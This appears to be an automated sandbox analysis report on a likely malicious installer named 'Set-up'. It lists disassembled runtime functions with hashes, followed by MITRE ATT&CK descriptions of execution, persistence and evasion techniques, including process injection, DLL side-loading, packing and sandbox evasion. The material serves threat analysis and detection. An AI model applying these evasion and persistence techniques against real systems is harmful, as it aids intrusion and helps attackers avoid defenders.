Function 6BB40841 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_memmove.LIBCMT(?,00000000,?), ref: 6BB40872
_errno.MSVCR100 ref: 6BB695F4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB695FE
_errno.MSVCR100 ref: 6BB6960A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_memmove
String ID:
API String ID: 3898388434-0
Opcode ID: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
Instruction ID: 9480c15f3ad5f8cbebb49dd45dced405e9e3c27de70ffe3abbf99bb8b31457c8
Opcode Fuzzy Hash: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
Instruction Fuzzy Hash: BEF0BE31144395ABDB115F68EC4979A3794AB187A4F004025FC0887144EB7CC840CEA2

Function 6BB515F6 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB51658,0000000C), ref: 6BB51621

Part of subcall function 6BB4A557: _lock.MSVCR100(?,?,?,6BB96EA0,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB4A584

_fwrite_nolock.MSVCR100(?,?,?,?,6BB51658,0000000C), ref: 6BB51636

Part of subcall function 6BB5153C: memcpy.MSVCR100(?,?,?), ref: 6BB515D5

Part of subcall function 6BB51674: _unlock_file.MSVCR100(6BB5164D,6BB5164D), ref: 6BB51677

_errno.MSVCR100(6BB51658,0000000C), ref: 6BB68E41
_invalid_parameter_noinfo.MSVCR100(6BB51658,0000000C), ref: 6BB68E4C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_fwrite_nolock_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy
String ID:
API String ID: 1711487722-0
Opcode ID: 92262ceb83780d7743bf4c5bb5b81079c1464d7519915f25d923583e8a8f0f5c
Instruction ID: 7ad54b2dc7c5bcab5946da738495fba821e48968138a6b6297dca3da0fd727f2
Opcode Fuzzy Hash: 92262ceb83780d7743bf4c5bb5b81079c1464d7519915f25d923583e8a8f0f5c
Instruction Fuzzy Hash: 37F062329016A9EBCF01AFB4DD0249E7B60BF04714F584556F42456168CB7CCA70EFA3

Function 6BB78E9F Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB78EA6
CloseHandle.KERNEL32(?,00000004,6BB78BA2), ref: 6BB78ED0
CloseHandle.KERNEL32(?,00000004,6BB78BA2), ref: 6BB78EE4
??3@YAXPAX@Z.MSVCR100(?), ref: 6BB78F14

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CloseHandle$??3@H_prolog3
String ID:
API String ID: 236738836-0
Opcode ID: 8c4965910d8a3274ecbd88de5a2e41b0f26df1cf110225c06fad2e8c79993308
Instruction ID: b36ffabc5fb36147f0ef9c9904ef984bc62eff1c3fdc15773b63b15491d0e91e
Opcode Fuzzy Hash: 8c4965910d8a3274ecbd88de5a2e41b0f26df1cf110225c06fad2e8c79993308
Instruction Fuzzy Hash: 97F04FB19007908BE730AF71C88575E72E4BF14259F64885CD1BD97240DF7DE804DB64

Function 6BB4A934 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,?,?,?,?,?,?,6BB4A990,0000000C), ref: 6BB4A961

Part of subcall function 6BB4A557: _lock.MSVCR100(?,?,?,6BB96EA0,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB4A584

_fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6BB4A990,0000000C), ref: 6BB4A96C

Part of subcall function 6BB4A8DF: __freebuf.LIBCMT ref: 6BB4A903
Part of subcall function 6BB4A8DF: _fileno.MSVCR100(?,?,?), ref: 6BB4A909
Part of subcall function 6BB4A8DF: _close.MSVCR100(00000000,?,?,?), ref: 6BB4A90F

Part of subcall function 6BB4A9AC: _unlock_file.MSVCR100(?,6BB4A981,?,?,?,?,?,?,6BB4A990,0000000C), ref: 6BB4A9AD

_errno.MSVCR100(?,?,?,?,?,?,6BB4A990,0000000C), ref: 6BB68BC3
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB4A990,0000000C), ref: 6BB68BCE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
String ID:
API String ID: 1403730806-0
Opcode ID: f683fe82fd92e96586cc8ef0e29492ec2e5cdd3386452348fffe5a6ce0146d0c
Instruction ID: 72f982de81f09f736be360696df0b6fb3d824f3734b489ccd5f38a2d07718e98
Opcode Fuzzy Hash: f683fe82fd92e96586cc8ef0e29492ec2e5cdd3386452348fffe5a6ce0146d0c
Instruction Fuzzy Hash: A5F0B471C157C5EADB109B78C802B5FB7A0BF01338F218669D434AA1C8DB7C8A41AF59

Function 6BB7C7DC Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB7C7E3
EnterCriticalSection.KERNEL32(?,00000004,6BB787CA,?), ref: 6BB7C7F6

Part of subcall function 6BB7892E: TlsSetValue.KERNEL32(?,?,?,?,?), ref: 6BB7895B
Part of subcall function 6BB7892E: GetCurrentThread.KERNEL32 ref: 6BB7898C

LeaveCriticalSection.KERNEL32(?), ref: 6BB7C830
SetEvent.KERNEL32(?), ref: 6BB7C83F

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalSection$CurrentEnterEventH_prolog3LeaveThreadValue
String ID:
API String ID: 2643705923-0
Opcode ID: 117d0f903182a944888e5640c20f98d4e690a2da12c6c0552933d953e88c20ca
Instruction ID: 207418d4a9bb74f947897f452a7475bc41798f0be6814afa08500ea4f5c00ac9
Opcode Fuzzy Hash: 117d0f903182a944888e5640c20f98d4e690a2da12c6c0552933d953e88c20ca
Instruction Fuzzy Hash: C3F03C709002D4AFCF21BF34C9897AD7BA4BF01309F0444A9E9656B145D73EDA84DB51

Function 6BB823B9 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6BB823C6

Part of subcall function 6BB8214D: std::exception::exception.LIBCMT(6BB81FE2,?,6BB81FE2,00000001), ref: 6BB8216C
Part of subcall function 6BB8214D: _CxxThrowException.MSVCR100(?,6BBE0018,6BB81FE2), ref: 6BB82181

std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6BB823DE
_CxxThrowException.MSVCR100(?,6BBE0034,?,00000008,00000002), ref: 6BB823F3
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6BB823FD

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
String ID:
API String ID: 1427302437-0
Opcode ID: 5eded2a53bfd95dc751dd7174b03cd97942f6063f45e744e957b01b3e3ffba7f
Instruction ID: 9ccbcbee7e26d466049a1225e67ea2af6627cbe3262100f52b6b98a3b51cbe5b
Opcode Fuzzy Hash: 5eded2a53bfd95dc751dd7174b03cd97942f6063f45e744e957b01b3e3ffba7f
Instruction Fuzzy Hash: 9AF03735500288AFCB05EFA9D453E9E77BCDB443C8F008065EA2A9B150DF78E645CB51

Function 6BB4CA89 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_wfsopen.MSVCR100(?,?,00000080), ref: 6BB4CAA5
_errno.MSVCR100 ref: 6BB4D061
_errno.MSVCR100 ref: 6BB694E0
_invalid_parameter_noinfo.MSVCR100 ref: 6BB694EA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_wfsopen
String ID:
API String ID: 972587971-0
Opcode ID: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
Instruction ID: 86d2e3b8b3b6a9a86ea001d082209a9430066da85d917b20fd909441a4f7d4ab
Opcode Fuzzy Hash: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
Instruction Fuzzy Hash: 3FE092316406A5ABD721AF789C02A9E37A4BF45F58F040061F9549B218FF79D804EBC1

Function 6BB96E6B Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

_errno.MSVCR100(6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB96E83
_invalid_parameter_noinfo.MSVCR100(6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB96E8E

Part of subcall function 6BBBAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BB8B84F,?,6BB8C3D3,00000003,6BB674A4,6BB4AA18,0000000C,6BB674F7,00000001,00000001), ref: 6BBBAEB5

_lock_file.MSVCR100(00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB96E9B
_ungetc_nolock.MSVCR100(?,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB96EAB

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
String ID:
API String ID: 3962069902-0
Opcode ID: 360ab4e8b03dd9ca1f00efb7126a27893a6283dee84642677616d6b5e6b7ee3e
Instruction ID: 8307b7a213e21deb14fb6769969cf86a30388346aca65d4152aabb4d00b80f81
Opcode Fuzzy Hash: 360ab4e8b03dd9ca1f00efb7126a27893a6283dee84642677616d6b5e6b7ee3e
Instruction Fuzzy Hash: E1F01232804689EADB006F74E80265E3770BF01338F608665E025991E4DF7C8941AF55

Function 6BB51868 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB518B8,0000000C), ref: 6BB51887

Part of subcall function 6BB4A557: _lock.MSVCR100(?,?,?,6BB96EA0,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB4A584

_ftell_nolock.MSVCR100(?,6BB518B8,0000000C), ref: 6BB51894

Part of subcall function 6BB517C4: _fileno.MSVCR100(?), ref: 6BB517DD
Part of subcall function 6BB517C4: _lseek.MSVCR100(00000000,00000000,00000001), ref: 6BB517F5

Part of subcall function 6BB518D4: _unlock_file.MSVCR100(?,6BB518A9,6BB518B8,0000000C), ref: 6BB518D7

_errno.MSVCR100(6BB518B8,0000000C), ref: 6BB68DF8
_invalid_parameter_noinfo.MSVCR100(6BB518B8,0000000C), ref: 6BB68E03

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_fileno_ftell_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
String ID:
API String ID: 2873353448-0
Opcode ID: 8749be327a14aa037c04cb5f4209636e71ea5ff51a89b4f64981af57070bd073
Instruction ID: b43e863224f220fe6b87e363d4302525ee0c12648a7f4120dcccca35957cc036
Opcode Fuzzy Hash: 8749be327a14aa037c04cb5f4209636e71ea5ff51a89b4f64981af57070bd073
Instruction Fuzzy Hash: 35F06531841295FAEF10AF74CC027DE3BA0BF01329F648625A024991D4DF7C8951EF66

Function 6BB7B13F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 6BB7615A: TlsGetValue.KERNEL32(?,6BB8558F,00000000,6BB85EC0,?,?,?,00000000,?,?,?,6BB85DCC,00000001), ref: 6BB7616F

std::exception::exception.LIBCMT(?), ref: 6BB7B171

Part of subcall function 6BBB3502: std::exception::_Copy_str.LIBCMT(6BB82171,?,?,6BB82171,6BB81FE2,?,6BB81FE2,00000001), ref: 6BBB351D

_CxxThrowException.MSVCR100(?,6BBDFF4C,?), ref: 6BB7B186

Part of subcall function 6BB577D4: RaiseException.KERNEL32(?,?,6BB6F317,?,?,?,?,?,6BB6F317,?,6BB4BDD8,6BBE7580), ref: 6BB57813

Strings

Lock already taken as a writer, xrefs: 6BB7B16A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Exception$Copy_strRaiseThrowValuestd::exception::_std::exception::exception
String ID: Lock already taken as a writer
API String ID: 323788321-3737755527
Opcode ID: 867658a9bc7ab9bc47ee02211759452c7eb131e130c5c48feaa1b3575d514c6f
Instruction ID: 6ba5e07c76eb561021f737fb8020a101ee64cb77de17043a7d7e51faf2c31493
Opcode Fuzzy Hash: 867658a9bc7ab9bc47ee02211759452c7eb131e130c5c48feaa1b3575d514c6f
Instruction Fuzzy Hash: ED21D631A202459FCB31EF64C8A4B9EB7B4FF45365F1085A8D535AB290DB38E906CF90

Function 6BB4380F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB6931E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69329

Strings

B, xrefs: 6BB43844

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
Instruction ID: 0980ef00ab6132d302cb1126f66e846c4ad91fe8a71e0aa4913830a78d3fd753
Opcode Fuzzy Hash: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
Instruction Fuzzy Hash: 3BF06D74D0024EABDF049F65C801AEEBBB5FF88328F108225E824722D0EB798111DFA5

Function 6BBB583C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BBB5871
DName::DName.LIBCMT ref: 6BBB587D

Strings

{flat}, xrefs: 6BBB586C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 4bb370c4433d7f0b4a4acdde713235f768564991b1e0ab10a8078043679b7b32
Instruction ID: ea99e8a0d1a1a3eb2f530c551d91d92aae536a88ceefde928908b9214a2a8000
Opcode Fuzzy Hash: 4bb370c4433d7f0b4a4acdde713235f768564991b1e0ab10a8078043679b7b32
Instruction Fuzzy Hash: 92F065351542849FCB01CF98E865BF83BA4EB42795F088085EA4C0F256CF75D441DB96

Function 6BB7C644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT(6BB7C69C), ref: 6BB7C660
_CxxThrowException.MSVCR100(00010000,6BBDFE78,6BB7C69C), ref: 6BB7C675

Strings

version, xrefs: 6BB7C683

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ExceptionThrowstd::exception::exception
String ID: version
API String ID: 4279132481-3206337475
Opcode ID: 85e84a087aaa5d02db223ebdde39f4dd3eaa6c84e61d54a55cfae27d1aa61673
Instruction ID: 9a37dda4ba09edd3c7c5b771972748248bcffaa28dc711570f38ec1a298b60ac
Opcode Fuzzy Hash: 85e84a087aaa5d02db223ebdde39f4dd3eaa6c84e61d54a55cfae27d1aa61673
Instruction Fuzzy Hash: 1AF0ACB5804188BADB20EF55E482BCD7F68EB54384F10D1B9E82557140DB7CD689CB95

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

